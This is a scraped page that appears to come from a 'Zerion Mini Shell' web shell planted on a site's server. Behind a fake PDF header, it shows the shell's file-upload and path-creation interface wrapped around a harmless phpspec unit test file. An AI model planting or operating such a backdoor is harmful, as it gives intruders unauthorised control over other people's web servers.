%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/rental/vendor/phpspec/phpspec/spec/PhpSpec/Message/
Upload File :
Create Path :
Current File : /var/www/html/rental/vendor/phpspec/phpspec/spec/PhpSpec/Message/CurrentExampleTrackerSpec.php

<?php

namespace spec\PhpSpec\Message;

use PhpSpec\Message\CurrentExampleTracker;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;

class CurrentExampleTrackerSpec extends ObjectBehavior
{
    function it_is_initializable()
    {
        $this->shouldHaveType('PhpSpec\Message\CurrentExampleTracker');
    }

    function it_should_set_a_message()
    {
        $this->setCurrentExample('test');
        $this->getCurrentExample()->shouldBe('test');
    }

    function it_should_be_null_on_construction()
    {
        $this->getCurrentExample()->shouldBe(null);
    }
}

Zerion Mini Shell 1.0